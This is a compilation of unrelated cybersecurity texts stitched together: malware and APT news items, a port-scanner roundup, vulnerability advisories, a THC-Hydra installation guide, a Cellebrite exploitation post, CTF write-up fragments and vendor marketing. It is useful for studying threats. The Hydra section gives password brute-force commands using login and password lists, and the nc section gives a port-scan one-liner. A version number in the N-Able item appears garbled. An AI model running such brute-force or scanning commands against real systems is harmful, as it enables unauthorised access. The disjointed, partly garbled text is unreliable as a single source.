"For systems that are completely patched, they are pretty much not at risk, but there are millions of consumers out there not [fully patched]," Ferguson told internetnews.com. "It used to be we could tell customers only go to Web sites that are trusted. Unfortunately in this situation, that advice doesn't hold water because it's so broad."
As if 10,000 compromised Web sites isn't enough, victims are redirected to sites hosting a new and improved version of WebAttacker, a do-it-yourself malware kit that makes it relatively easy to build exploits, Trojans, keyloggers and other malicious software.
While most of the compromised Web sites are in Italy, Ferguson said most of the sites hosting WebAttacker are in the U.S. However, Trend Micro has not been able to reach the site administrators and has enlisted the help of law enforcement, so those sites owners will be receiving a visit from their local authorities shortly.
End users should ensure they have patched their computer fully, and for extra security, consider a redirect blocker, which is available for Firefox. Antivirus software will catch the malicious payload being sent by the sites hosting WebAttacker, but as Ferguson points out, all it takes is a minor change to that code and antivirus programs might not recognize them.
Trend Micro's ongoing effort to track the exploits can be found on its blog.
The compromise is reminiscent of the iframe redirect hack that was embedded into the homepage of Dolphin Stadium, the home arena of the Miami Dolphins football team and host to the most recent Super Bowl. A redirect would send visitors to the site, which saw inordinate traffic due to the Super Bowl, to a site that served up known compromises in Windows.
|
FireEye researchers have “moderate” confidence that the programme is being run by the Russian group APT28/Fancy Bears, citing the fact that it found malicious documents on these networks that had been used to install the cybergang's signature malware - Gamefish. The document is delivered through a spearphishing attack that uses a document that appears to be a basic reservation form.
FireEye also says that APT28 has incorporated several new techniques with these attacks, including using the EternalBlue SMB vulnerability leaked by ShaddowBrokers, originally from the NSA and behind the WannaCry and NotPetya ransomworm attacks launched in May and June of this year.
“Once inside the network of a hospitality company, APT28 sought out machines that controlled both guest and internal Wi-Fi networks. No guest credentials were observed being stolen at the compromised hotels,” FireEye said in a statement.
Once embedded in the target system the malware deployed Responder, which allows the malicious actors to listen for MBT-NS (UDP/137) broadcasts from the victim's computer as they attempt to connect to the network resources. Responder then pretends to be that resource and causes the computer to send the username and hashed password to the attacker-controlled computer. APT28 then uses these credentials to gain an escalation of privileges on the infected network.
“Travellers must be aware of the threats posed when travelling – especially to foreign countries – and take extra precautions to secure their systems and data. Publicly accessible Wi-Fi networks present a significant threat and should be avoided whenever possible,” FireEye concluded.
At least seven European and one Middle Eastern hotel are reported to have been targeted say FireEye researchers though no guest credentials were observed being stolen at the compromised hotels.
In an email to SC Chris Wysopal, co-founder and CTO at Veracode commented, “After the havoc that arose from the WannaCry and NotPetya attacks, it's not surprising that notorious cyber-gangs are finding new ways to use the NSA's EternalBlue exploit to support their criminal activities. The EternalBlue exploit has been shown to be extremely effective at spreading malware infections to other unpatched Microsoft systems.
“Microsoft has indicated that a number of different versions of Windows are vulnerable to the EternalBlue exploit, even those currently receiving support. It is imperative that IT teams from all businesses across all industries ensure that the version of Windows that they are using is not vulnerable to EternalBlue and, if so, take the necessary steps to remediate it. With three attacks using this exploit having occurred over just the past few months, we're likely to see cybe-rcriminals continuing to deploy it until devices are patched and it is no longer an effective vector for them to spread malware.”
Separately the CIA hacking tool ‘CouchPotato has been released on WikiLeaks Vault 7; it is reported to remotely capture videos and images WikiLeaks. It can capture and collect videos steaming in RTSP/H.264 formats and can also capture image frames.
Days earlier WikiLeaks revealled details on “Dumbo” , reportedly a CIA cyber-weapon developed to hack webcams and corrupt video recordings; it can selectively capture images that show a significant change from the previous frame
Rick McElroy, security strategist, Carbon Black, commented in an email to SC: “Sophisticated tools are now in the hands of nation states who can further enhance their offensive security programmes. Cyber-criminals will leverage these tools to ransom any endpoints they can get their hands on. Attackers will have continued success against companies who do not have the visibility to see these advanced attacks.”
|
Although I have been a TCP/IP networking professional for decades, in the last 10 years I’m also involved in network security as well.
One of the tasks I’m responsible to do in my work environment is to either coordinate or perform network assessment projects on my own.
A major part of a network security assessment is vulnerability discovery and penetration testing to identify weaknesses and possible exposures of systems to security threats.
The first phase of a security assessment job is to discover your possible targets over the network. This means scanning the target network to see which hosts are live and which TCP/UDP ports are open on the remote hosts.
By getting as much knowledge as possible about the open ports (i.e which services are running on the remote hosts) you can proceed with finding possible vulnerabilities, misconfigured services etc.
Moreover, scanning for open ports can help you check whether a firewall is correctly configured and that it does not allow unnecessary services to be visible/exposed on the public Internet.
Therefore, a port scanner utility is essential to evaluate Windows and Linux target machines for both security and network admin professionals.
Here are 13 free (and some open source) IP port scanners that can work on either Windows or Linux and are meant specifically to help with network discovery and security evaluation.
NMAP is a free and open-source port scanner that is designed for versatility combined with ease of use. It runs on both Windows and Linux machines and is very reliable.
This is the de facto tool used by almost every security professional in a network discovery task.
NMAP is designed to be flexible and is able to handle IP filters, firewall evasion, multiple scanning techniques, reporting results in various formats, customization, discovery of operating systems and service versions running on hosts etc.
It can also handle scanning hundreds of thousands of machines if you are searching for a port scanner for business purposes.
If you are looking for an accredited, powerful and reliable port scanner, then NMAP is going to be it, having won several awards from the likes of Linux Journal, Info World, and Codetalker Digest.
As shown on the screenshot above, I have run a very basic nmap scan against IP address 192.168.0.1. As you can see, the tool discovered several open ports and also tells you what services are running on these ports.
ZENMAP is actually related to NMAP, coming from the same creators. However, its purpose is more directed towards being a Security Scanner GUI as it helps NMAP be more accessible to people who might not be the most tech-savvy around.
It is multi-platform, meaning that you can run it on just about any computer such as Windows, Linux, MAC etc. It also can be downloaded in a package alongside NMAP so that you don’t even have to do any extra searching for this program.
After starting ZENMAP, you can click and select several options which are translated to actual NMAP commands. The engine that runs the port scanning is the actual nmap tool we described above.
ManageEngine is a company that develops a wide range of software tools related to managing, monitoring and troubleshooting IT network infrastructures.
OpUtils is a software suit from ManageEngine that includes also network scanning functionality. It can be downloaded with 30-day free trial, however, even after the 30-days trial, the network scanning functionality is free for ever (see table below):
The tool enables you to perform full-fledged port scanning in your network to detect open ports and services and find live hosts using ping, snmp ping, DNS etc.
If you want to have also visibility into the physical network ports of the network switches in your environment, you can opt for the paid version of OpUtils which scans also the switch ports and maps the connectivity details in Layer 2 level.
Everyone loves having a program that is easy to work with and easy to understand. The Solarwinds Port Scanner provides exactly that.
Designed to scan any available IP addresses alongside their TCP and UDP ports, you will be able to identify any network vulnerabilities that you may have, among other things.
If you value your security and you want to easily understand the information your port scanner is providing you, then this is the way to go.
Solarwinds is a reputable and popular vendor of software products related to networking, monitoring, infrastructure management etc.
This tool is also free (although you have to register to download) and is very close to nmap in terms of features and capabilities.
Another thing that many people can appreciate is having a program that is versatile and that has been around for a while.
After all, if a program has been around since the mid-2000s, then there’s a good chance that it is being run by people who understand quite a bit about the intricacies of network scanning.
MyLANViewer is one such scanner and it allows you to find IP addresses, MAC addresses, and even shared folders on both wireless and wired networks.
This software looks outdated but it actually works on almost all versions of Windows such as Windows 10 (32-bit, 64-bit), 7, 8, XP, Vista etc.
The tool utilizes Netbios to discover also possible shared folders of Windows machines on the network.
The main difference with other tools on this list is that it does not scan for open/closed ports but rather it can trace and identify live computers connected to your wired or WiFi network.
Another powerful and open source little software that is so flexible that they named it “the swiss army knife of TCP/IP network utilities”.
Its main purpose is not used as port scanner but rather it is used to send and receive TCP packets over the network.
However, it can be used easily as a port scanner because you can send packets towards a specific TCP port to the remote host and listen for the reply. This can tell you if the remote port is open or not.
Here is an example below how ncat can be used to scan for open ports on remote host 192.168.0.5
nc -v -z -w1 192.168.0.5 1-1024
The command above will probe remote IP 192.168.0.5 for open ports in the range of 1-1024. Note that the port range above is the “well known” port range that most services are running on.
One special feature that Netcat offers is “tunneling mode,” which allows special tunneling to UDP and TCP while also specifying the network parameters and letting the remote host connect through the tunnel. Depending on what your needs are, this can help you out significantly especially in penetration testing for “lateral movement”.
One thing that many people also appreciate is being able to download their port scanners from a reliable resource and there is nothing that has as solid a reputation as the Microsoft Store does.
The Cenix Network Port Scanner does exactly what you need it to, allowing you to scan ports and test your general network security. It also has an easy-to-navigate interface so just about anyone can use it without any complications.
It can even scan a range of both IP addresses and ports so that you can use it on big networks as well.
Sometimes simplicity is best and this is where Advanced Port Scanner shows off what it has.
With features such as multithreaded scanning, identification of services running on remote machines, remote access via RDP (Microsoft Remote Desktop Protocol) etc, Advanced Port Scanner can do a fair bit more than just scan IPs and look for security holes.
In fact, you can do a considerable amount of work from remote access using this program, including running commands on a remote computer as well. This versatile program will be able to help your personal network or your business’s online security and is also free!!
Sometimes a network administrator or security professional just wants to see quickly what IP addresses are live on a specific network. By downloading Angry IP scanner, and without even installing the software, you can just execute a quick IP scan and get results back fast.
In addition to pinging the remote hosts to identify if they are alive or not, it can also do port scanning, MAC address scanning and even get NetBIOS information. All data is then exportable to CSV, Text, XML etc.
This program is also open-source, which is something else that you should be looking for, and it does not require any installation after the initial download. You can freely download it and run it on any Operating System you want.
This tool is free for scanning up to 100 assets (network nodes). Above that, there is a charge of $1 per asset per year.
LAN Sweeper IP Scanner has an integrated help desk, central communication hub, and ticketing system that allows users and agents to open tickets related to network issues. This puts it a step above other IP-scanning programs.
Other than that, it includes all basic and advanced features that a network admin will need in a network discovery software.
The IP scanner functionality of the software is just a small part of a whole umbrella of all the features that are offered. This is a full-fledged centralized IT inventory management solution.
The website of this software claims that it’s a “Premium IP Scanner for Windows”. It’s a paid tool however you can use it for free if you scan less than 50 network devices.
This makes it ideal for home and small office environments although the paid versions are pretty affordable.
It boasts the title of being a premium next-generation network scanner, being able to gather information from devices without credentials or agents.
The tool can identify the type of operating system of remote hosts by using TCP/IP fingerprinting without having to log in to the remote host or install an agent to the remote host.
However, keep in mind that the above capability is also available on NMAP as well although the device DB of Komodo might be bigger than NMAP.
While there are countless programs, both free and paid for, that you can get on computers and laptops, there are not many programs that are designed to scan IPs when you are on a mobile device — that is, aside from Port Authority Mobile App (and a few others of course).
As you might be able to imagine, this app is designed to be more effective and useful in scanning your WiFi network since it runs on a mobile device. However, it can find also LAN connected devices as well.
This scanner is meant for Android devices specifically. It can be found on the Google Play Store and it boasts being one of the fastest scanners on the market claiming to scan 1000 ports within 5 to 10 seconds.
Last but certainly not least is the MiTec Network Scanner which is supported on all versions of Windows (10, 7, 8, XP, Server 2012, 2016 etc).
It is a freeware tool that is based on Donations. Considering the effort given in developing this useful tool and the great features it has, being free is unbelievable. It has capabilities found only on commercial solutions.
What I like about this software is that you can setup the credentials of systems in the tool which can log in to remote systems and perform deep scans (of registry, using SNMP etc). In addition to that, regular port scanning and ICMP scanning can also be done for general host discovery.
So there you have it. These port scanning and network discovery tools will be a great addition to your software arsenal as a network or security professional.
- 15 Best Firewall Management Software Tools for Rules and Policies
- 11 Alternatives to Solarwinds NPM for I.T and Network Monitoring
- 12 Splunk Alternatives for Log Analysis, Observability and SIEM
- 10 Useful Network Documentation Tools for IT and Networking Professionals
- Top 10 PRTG Alternatives for Monitoring Networks and IT Infrastructure
|
Today another new attack on Facebook users with the Zeus Bot comes in action. Researchers at Danish security firm CSIS, have spotted a worm spreading within the Facebook platform. The new worm has popped up on Facebook, using apparently stolen user credentials to log in to victims’ accounts and then send out malicious links to their friends. The worm also downloads and installs a variety of malware on users’ machines, including a variant of the Zeus bot.
If followed, the link takes potential victims to a page where he or she are offered what appears to be a screensaver for download. Unfortunately, it is not a JPG file, but an executable (b.exe). Once run, it drops a cocktail of malicious files onto the system, including ZeuS, a popular Trojan spyware capable of stealing user information from infected systems. The worm is also found to have anti-VM capabilities, making it useless to execute and test in a virtual environment, such as Oracle VM VirtualBox and VMWare.
Zeus is a common tool in the arsenal of many attackers these days, and is used in a wide variety of attacks and campaigns now. It used to be somewhat less common, but the appearance of cracked versions of the Zeus code has made it easier for lower-level attackers to get their hands on the malware. Zeus has a range of capabilities, and specialises in stealing sensitive user data such as banking credentials, from infected machines.
The worm carries a cocktail of malware onto your machine, including a Zbot/ZeuS variant which is a serious threat and stealing sensitive information from the infected machine,” warn the researchers. The worm is hosted on a variety of domains, so the link in the malicious message may vary. Other servers are used to collect the data sent by the malware and to serve additional malicious software.
As always be very wary of any links that are posted to you on Facebook, even if they appear to be from your friends. Also if you receive any emails asking for login details or banking details, or even if they just request your name and address be very wary.
- If you haven’t asked for a password reset then a company won’t have sent you an email asking you to reset your password.
- If you haven’t made a banking transaction recently then your bank won’t be cancelling it.
- etc etc etc
|
Family: CGI abuses : XSS --> Category: attack
Snitz Forums 2000 type Parameter Cross-Site Scripting Vulnerability Vulnerability Scan
Vulnerability Scan Summary
Checks for type parameter cross-site scripting vulnerability in Snitz Forums 2000
Detailed Explanation for this Vulnerability Test
The remote web server contains an ASP script that is prone to a cross-
site scripting attack.
The remote host is running Snitz Forums 2000, a web-based electronic
forum written in ASP.
The version of Snitz Forums 2000 installed on the remote host fails to
sanitize the 'type' parameter before using it in the 'post.asp' script
to generate dynamic content. By leveraging this flaw, a possible hacker may
be able to execute arbitrary HTML and script code in a user's browser
within the security context of the affected application.
See also :
Upgrade to Snitz Forums 2000 version 3.4.06 or later.
Low / CVSS Base Score : 2
Click HERE for more information and discussions on this network vulnerability scan.
|
A high-severity security flaw has been disclosed in N-Able's Take Control Agent that could be exploited by a local unprivileged attacker to gain SYSTEM privileges.
Tracked as CVE-2023-27470 (CVSS score: 8.8), the issue relates to a Time-of-Check to Time-of-Use (TOCTOU) race condition vulnerability, which, when successfully exploited, could be leveraged to delete arbitrary files on a Windows system.
The security shortcoming, which impacts versions 184.108.40.2061 and prior, has been addressed in version 7.0.43 released on March 15, 2023, following responsible disclosure by Mandiant on February 27, 2023.
Time-of-Check to Time-of-Use falls under a category of software flaws wherein a program checks the state of a resource for a specific value, but that value changes before it's actually used, effectively invalidating the results of the check.
An exploitation of such a flaw can result in a loss of integrity and trick the program into performing actions that it shouldn't otherwise, thereby permitting a threat actor to gain access to unauthorized resources.
"This weakness can be security-relevant when an attacker can influence the state of the resource between check and use," according to a description in the Common Weakness Enumeration (CWE) system. "This can happen with shared resources such as files, memory, or even variables in multithreaded programs."
According to the Google-owned threat intelligence firm, CVE-2023-27470 arises from a TOCTOU race condition in the Take Control Agent (BASupSrvcUpdater.exe) between logging multiple file deletion events (e.g., files named aaa.txt and bbb.txt) and each delete action from a specific folder named "C:\ProgramData\GetSupportService_N-Central\PushUpdates."
"To put it simply, while BASupSrvcUpdater.exe logged the deletion of aaa.txt, an attacker could swiftly replace the bbb.txt file with a symbolic link, redirecting the process to an arbitrary file on the system," Mandiant security researcher Andrew Oliveau said.
"This action would cause the process to unintentionally delete files as NT AUTHORITY\SYSTEM."
Even more troublingly, this arbitrary file deletion could be weaponized to secure an elevated Command Prompt by taking advantage of a race condition attack targeting the Windows installer's rollback functionality, potentially leading to code execution.
"Arbitrary file deletion exploits are no longer limited to [denial-of-service attacks and can indeed serve as a means to achieve elevated code execution," Oliveau said, adding such exploits can be combined with "MSI's rollback functionality to introduce arbitrary files into the system."
"A seemingly innocuous process of logging and deleting events within an insecure folder can enable an attacker to create pseudo-symlinks, deceiving privileged processes into running actions on unintended files."
|
A new multi-purpose Linux Trojan that opens a backdoor on the target machine and can make it participate in DDoS attacks has been discovered and analyzed by Dr. Web researchers, who believe that the Chinese hacker group ChinaZ might be behind it.
The malware, dubbed Xnote, gets delivered on the target computer after the attackers mount a successful brute force attack and establish an SSL connection with the machine.
The Trojan first checks whether a copy of the same malware is already running on the machine. If it does, the newcomer will yield the floor and exit.
Xnote tries to hide by making a copy of itself and deleting the original launch file, and assures its persistence by adding a script that will launch it automatically each time after the machine is rebooted.
The backdoor contains a list of control servers within its body, and tries to contact them one by one. Once a connection to one of the servers is established, information is exchanged between them in compressed packets.
“First, Linux.BackDoor.Xnote.1 sends information about the infected system to the server. It then goes into standby mode and awaits further instructions. If the command involves carrying out some task, the backdoor creates a separate process that establishes its own connection to the server through which it gets all the necessary configuration data and sends the results of the executed task,” the researchers explained.
“Thus, when commanded to do so, Linux.BackDoor.Xnote.1 can assign a unique ID to an infected machine, start a DDoS attack on a remote host with a specific address (it can mount SYN Flood, UDP Flood, HTTP Flood and NTP Amplification attacks), stop an attack, update its executable, write data to a file, or remove itself.”
The malware can also create, rename, run, delete files as well as accept additional files from the C&C server. It can create and delete directories, create a list of files and directories inside specified directory, and send directory size data to the server.
“In addition, the backdoor can run a shell with the specified environment variables and grant the C&C server access to the shell, start a SOCKS proxy on an infected computer, or start its own implementation of the portmap server,” the researchers noted.
It’s also good to know that Xnote gets installed on a target machine only if it’s been launched with root privileges.
|
An HTTP request generally contains a URL and a Host header:
Many requests ordinarily return "redirect" responses, instructing the client to request a different resource:
The location response value is constructed from the host header value and the URL.
The advisory describes how many web servers can be provoked to issue an incorrect redirect by supplying a carefully crafted, invalid host header. For example, using the host header
No standard web client would accidentally or deliberately cause this behaviour. This behaviour can only be caused by a deliberately mal-formed HTTP request.
Exploiting this Location redirect behaviour
The advisory surmises that this behaviour could be exploited by poisoning a web cache with the invalid response, so that legitimate users received the invalid redirect when accessing the web site. The advisory is broadly incorrect in this respect; web caches will cache responses based on the request URL and Host header (as well as other criteria), so will only issue the invalid redirect to requests that contain the invalid host header.
One exception occurs when the web cache is deliberately configured to ignore the host header when caching responses. This is a suggested configuration when using Squid as an HTTP accelerator directly in front of a web server that only hosts one web site (domain). It cannot be used when using Squid to accelerate multiple domains.
If you are fronting a web server with a reverse proxy cache that has been configured to ignore host headers, it may be possible to poison the cache and mount an effective Denial of Service attack.
If you are concerned about this behaviour, you can configure Zeus Web Server to remove path and port components from host headers in a request. The following Request Rewriting rule can be applied to your virtual servers:
Preserving the port in the host header is a necessary consequence of the HTTP protocol, and HTTP allows for host headers that include port numbers. This caters for the possibility that the public port is different to the actual internal port (for example, when running through a proxy on the same server).
Zeus Technology works closely with customers, evaluators, security professionals and other researchers to ensure its products are secure and free from defects. Any security-related comments received at [email protected], or through any other means, are treated as being of the utmost importance. Zeus respectfully requests that security issues are notified directly to Zeus before being publicly disclosed.
Owen Garrett [Zeus Dev Team] 15 February 2007
Comments are closed for this post.
|
An emerging threat actor out of China has been traced to a new hacking campaign aimed at government agencies in India and residents of Hong Kong intending to steal sensitive information, cybersecurity firm Malwarebytes revealed in the latest report shared with The Hacker News.
The attacks were observed during the first week of July, coinciding the passage of controversial security law in Hong Kong and India’s ban of 59 China-made apps over privacy concerns, weeks after a violent skirmish along the Indo-China border.
Attributing the attack with “moderate confidence” to a new Chinese APT group, Malwarebytes said they were able to track their activities based on the “unique phishing attempts” designed to compromise targets in India and Hong Kong.
The operators of the APT group have leveraged at least three different Tactics, Techniques, and Procedures (TTPs), using spear-phishing emails to drop variants of Cobalt Strike and MgBot malware, and bogus Android applications to gather call records, contacts, and SMS messages.
“The lures used in this campaign indicate that the threat actor may be targeting the Indian government and individuals in Hong Kong, or at least those who are against the new security law issued by China,” the firm said.
Using Spear-Phishing to Install MgBot Malware
The first variant, observed on July 2, alerted recipients with the “gov.in” domain stating some of their email addresses had been leaked and that they are to complete a security check before July 5.
The emails come attached with a “Mail security check.docx” purportedly from the Indian Government Information Security Center. Upon opening, it employs template injection to download a remote template and execute a heavily obfuscated variant of Cobalt Strike.
images from Hacker News
|
Penetration testing is one of the most important stages of any security analysis, so researchers should always have the best tools in this process. On this occasion, cybersecurity experts from the International Institute of Cyber Security (IICS) will show you how to install HYDRA, one of the most popular pentesting tools.
THC-HYDRA, or simply known as Hydra, is a pentesting tool, open port analysis, and website scanning. The tool was designed for more efficient almost any cracking process and is available only for Linux systems, although it is equally functional in emulators such as Termux, say cybersecurity experts.
Installing Hydra requires our implementation (Kali Linux or Termux) to meet the following requirements:
- 1 GB of data storage
- 50 MB of internet data
- 3 GB of RAM for better performance
- Android device 5v.0.0 or higher rooted
If our system meets these requirements, we may continue to:
- Install Termux from the F-droid app and upgrade it to the latest version available and enter the following code:
apt-get update apt-get upgrade
- After updating Termux, install basic packages like python, curl, wget, php:
apt install -y python php curl wget git nano
- Open Terux Home directory:
- Then clone the hydra link in termux/kali, the cybersecurity experts mentioned:
git clone https://github.com/vanhauser-thc/thc-hydra
- Open the cloned Hydra repository on your terminal:
- Install some packages by running the configuration script:
./configure make make install
- All ready to use, now just enter the help command:
- Let’s look at a case study. Suppose you want to hack the FTP port, for which cybersecurity experts recommend the following command:
./hydra -l admin -p password ftp://localhost/
For more information on the target system you can use the commands shown below. More information is available in the Hydra help menu.
hydra -l admin -p password ftp://localhost/ hydra -L default_logins.txt -p test ftp://localhost/ hydra -l admin -P common_passwords.txt ftp://localhost/ hydra -L logins.txt -P passwords.txt ftp://localhost/
As usual, we remind you that this article was prepared for informational purposes only, so IICS is not responsible for the misuse that may be given to the information contained herein.
To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.
He is a cyber security and malware researcher. He studied Computer Science at Miami and started working as a cyber security analyst in 2008. He is actively working as an cyber security investigator. He also worked for security companies like Cisco. His everyday job includes researching about new cyber security incidents. Also he has deep level of knowledge in enterprise security implementation.
|
Hackers are reviving a long-forgotten malware to help evade detection
A known Chinese threat actor is recycling old malware, in an attempt to evade detection, cut down on costs, and send researchers on a wild goose chase.
A report from Symantec says the group, known as Webworm, has used at least three ancient malware variants (and by “ancient”, we mean from 2008 – 2017), modified them a little bit, and then tested them out against IT service providers in Asia to see how they work.
Given the malware’s age, they sometimes manage to fly under antivirus solutions’ radars, they added.
The first one is called Trochilus RAT, in circulation since at least 2015, and freely available on GitHub.
It was first discovered attacking people visiting a Myanmar website. Webworm tweaked it so that it can load its configuration from a file by checking in a set of hardcoded directories. It was also said to have the ability to move laterally across endpoints in the target network, for better access. The second one is 9002 RAT, a stealthy remote access trojan that’s now gotten better encryption for its communication protocol, which made it even more difficult to detect.
Finally, the third is called Gh0st RAT, a 14-year-old trojan that now comes with “several layers of obfuscation, UAC bypassing, shellcode unpacking, and in-memory launch”.
While it’s difficult to know exactly which threat actor is behind Webworm’s revival, Symantec seems to believe it’s the same group as Space Pirates – a Chinese threat actor discovered by Positive Technologies in May this year. Back then, Positive Technologies analyzed Gh0st RAT and named it Deed RAT.
In any case, Webworm is a known cybercriminal group that’s been in operation since at least 2017. In the past, the group has been linked with various attacks on IT firms, aerospace organizations, as well as electrical energy providers in Russia, Georgia, and Mongolia.
- Here’s our rundown of the best ransomware protection services right now
Go to Source
|
Vulnerability identifier: #VU63500
Vulnerability risk: Medium
Exploitation vector: Network
Exploit availability: No
Vendor: Cisco Systems, Inc
The vulnerability allows a remote attacker to gain unauthorized access to sensitive information.
The vulnerability exists due to unrestricted access to the Redis instance running within the NOSi container, accessible via port 6379/tcp (the health check RPM opens this port by default). A remote non-authenticated attacker can connect to the Redis instance and obtain sensitive information or modify it.
Note, the vulnerability is being actively exploited in the wild.
Install updates from vendor's website.
Vulnerable software versions
Cisco IOS XR: 7.3.3
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.
Is there known malware, which exploits this vulnerability?
Yes. This vulnerability is being exploited in the wild.
|
Welcome to the Virus Encyclopedia of Panda Security.
Buzus.AH allows hackers to get into and carry out dangerous actions in affected computers, such as capturing screenshots, stealing personal data, etc.
It uses the following techniques to impede detection by antivirus companies:
- It terminates its own execution if it detects that it is being executed in a virtual machine environment, such as VMWare or VirtualPC.
It captures certain information entered or saved by the user, with the corresponding threat to privacy:
- Keystrokes, in order to obtain information for accessing online banking services, passwords and other confidential information.
It then sends the gathered information to a remote user by any available means: email, FTP
It reduces the security level of the computer:
- It changes the security settings of Internet Explorer, decreasing its security level.
Means of transmission
Buzus.AH does not spread automatically using its own means. It needs the attacking user's intervention in order to reach the affected computer. The means of transmission used include, among others, floppy disks, CD-ROMs, email messages with attached files, Internet downloads, FTP, IRC channels, peer-to-peer (P2P) file sharing networks, etc.
Buzus.AH has the following additional characteristics:
- It is 58880 bytes in size.
|
Security Vulnerabilities in Cellebrite
Moxie Marlinspike has an intriguing blog post about Cellebrite, a tool used by police and others to break into smartphones. Moxie got his hands on one of the devices, which seems to be a pair of Windows software packages and a whole lot of connecting cables.
According to Moxie, the software is riddled with vulnerabilities. (The one example he gives is that it uses FFmpeg DLLs from 2012, and have not been patched with the 100+ security updates since then.)
…we found that it’s possible to execute arbitrary code on a Cellebrite machine simply by including a specially formatted but otherwise innocuous file in any app on a device that is subsequently plugged into Cellebrite and scanned. There are virtually no limits on the code that can be executed.
This means that Cellebrite has one—or many—remote code execution bugs, and that a specially designed file on the target phone can infect Cellebrite.
For example, by including a specially formatted but otherwise innocuous file in an app on a device that is then scanned by Cellebrite, it’s possible to execute code that modifies not just the Cellebrite report being created in that scan, but also all previous and future generated Cellebrite reports from all previously scanned devices and all future scanned devices in any arbitrary way (inserting or removing text, email, photos, contacts, files, or any other data), with no detectable timestamp changes or checksum failures. This could even be done at random, and would seriously call the data integrity of Cellebrite’s reports into question.
That malicious file could, for example, insert fabricated evidence or subtly alter the evidence it copies from a phone. It could even write that fabricated/altered evidence back to the phone so that from then on, even an uncorrupted version of Cellebrite will find the altered evidence on that phone.
Finally, Moxie suggests that future versions of Signal will include such a file, sometimes:
Files will only be returned for accounts that have been active installs for some time already, and only probabilistically in low percentages based on phone number sharding.
The idea, of course, is that a defendant facing Cellebrite evidence in court can claim that the evidence is tainted.
I have no idea how effective this would be in court. Or whether this runs foul of the Computer Fraud and Abuse Act in the US. (Is it okay to booby-trap your phone?) A colleague from the UK says that this would not be legal to do under the Computer Misuse Act, although it’s hard to blame the phone owner if he doesn’t even know it’s happening.
|
The exam results webpage hosted on the official site of a high school in Jiangsu, China, has been compromised to serve as part of an attack that exploits the recently patched vulnerability in Microsoft XML Core Services.
Trend Micro experts identified the hijacked website just before the Redmond company released the permanent patch
for the flaw.
The large number of users who visited the website during the time it was altered were redirected multiple times until they reached a domain that hosted HTML_EXPLOYT.AE.
The exploit code generated memory corruption, causing certain versions of Internet Explorer to crash. After the successful execution of the memory corruption in the browser, a shell code would be launched.
In the end, a piece of malware was pushed onto the victim’s computer.
Fortunately, the website has been cleaned up, but this incident once again highlights the importance of applying updates, especially the ones for the operating system and other critical components.
|
This article was previously published under Q296576
This article has been archived. It is offered "as is" and will no longer be updated.
We strongly recommend that all users upgrade to Microsoft Internet Information Services (IIS) version 7.0 running on Microsoft Windows Server 2008. IIS 7.0 significantly increases Web infrastructure security. For more information about IIS security-related topics, visit the following Microsoft Web site:
Windows 2000 includes native support for Internet Printing Protocol (IPP), an industry-standard protocol for submitting and controlling print jobs over Hypertext Transfer Protocol (HTTP). The protocol is implemented in Windows 2000 by using an Internet Server Application Programming Interface (ISAPI) extension that is installed by default on all Windows 2000-based servers, but which can be accessed only by using IIS 5.0.
A security vulnerability exists because the ISAPI extension contains an unchecked buffer in a section of code that handles input parameters. This could enable a remote attacker to conduct a buffer overrun attack and cause code of his or her choice to run on the server. Such code would run in the Local System security context. This would give the attacker complete control of the server, and would enable him or her to take virtually any action he or she chose.
The attacker could exploit the vulnerability against any server with which he or she could conduct a Web session. No other services would need to be available, and only port 80 (HTTP) or 443 (HTTPS) would need to be open. This is a serious vulnerability, and Microsoft strongly recommends that all Internet Information Services (IIS) 5.0 administrators install this patch immediately.
NOTE: Although the affected component is not part of IIS, this vulnerability is exposed only if IIS 5.0 is running.
Servers on which the mapping for the Internet Printing ISAPI extension has been removed are not at risk from this vulnerability. The process for removing the mapping is discussed in the Secure Internet Information Services 5 Checklist document. The High Security template that is provided in the checklist removes the mapping, as does the Windows 2000 Internet Security tool unless the user explicitly chose to retain Internet printing.
The attacker's ability to extend his or her control from a compromised Web server to other computers would be heavily dependent on the specific configuration of the network. Best practices recommend that the network architecture reflect the position of special risk occupied by network-edge computers such as Web servers and use measures such as "demilitarized zones" (DMZs) and limited domain memberships to isolate such computers from the rest of the network. Taking such measures would impede an attacker's ability to broaden the scope of the vulnerability.
To resolve this problem, obtain the latest service pack for Windows 2000. For more information, click the following article number to view the article in the Microsoft Knowledge Base:
260910 How to obtain the latest Windows 2000 service pack
For more information about how to download Microsoft support files, click the following article number to view the article in the Microsoft Knowledge Base:
119591 How to obtain Microsoft support files from online services
Microsoft scanned this file for viruses. Microsoft used the most current virus-detection software that was available on the date that the file was posted. The file is stored on security-enhanced servers that help prevent any unauthorized changes to the file. The English version of this fix should have the following file attributes or later:
Date Time Version Size File name ------------------------------------------------------ 04/19/2001 03:25p 5.0.2195.2956 76,560 Msw3prt.dll
To work around this behavior and completely disable support for the Internet Printing Protocol (IPP) perform either of the following procedures:
From the Master IIS Properties, click Home Directory tab, click Configuration, click Printer Mapping, click Remove, and then click OK. When you are prompted for the child sites click Select All, click OK, and then restart IIS from Services in Control Panel.
Disable Web Printing by setting the following registry key:
|
Year of the Jellyfish is a room for the OSCP giveaway challenge, who complete the room by the 30th of April are entered into a raffle. The machine is a Linux machine. For user, the Monitorr web app has an RCE vulnerability but the exploit needs some edits to work. For root, the machine is vulnerable to dirty_sock due to a bug in the snapd API. This machine also comes with public IP address instead of an internal IP address(10.*.*.*).
Let’s start with an Nmap scan. There’re 8 ports open and the most interesting part is the SSL certificate of…
Hello guys, this’s my writeup on the Motunui room from TryHackMe, a Moana themed Linux box. This room is rated as hard but it’s not that hard actually. Let’s jump in!
Start with an nmap scan which shows that there’re 6 ports open.
# Nmap 7.80 scan initiated Thu Oct 5 11:23:38 2020 as: nmap -sCV -oN nmap/initial 10.10.223.235 -v
Nmap scan report for 10.10.223.235 Host is up (0.21s latency).
Not shown: 994 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh…
|
Cyber risk and advisory programs that identify security gaps and build strategies to address them.
MDR that provides improved detection, 24/7 threat hunting, end-to-end coverage and most of all, complete Response.
Our team delivers the fastest response time in the industry. Threat suppression within just 4 hours of being engaged.
Be protected by the best from Day 1.
24/7 Threat Investigation and Response.
Expert hunting, research and content.
Defend brute force attacks, active intrusions and unauthorized scans.
Protect assets from ransomware, trojans, rootkits and more.
Intelligence and visibility across AWS, O365, DevOps and more.
Configuration escalations, policy and posture management.
Detects malicious insider behavior leveraging Machine Learning models.
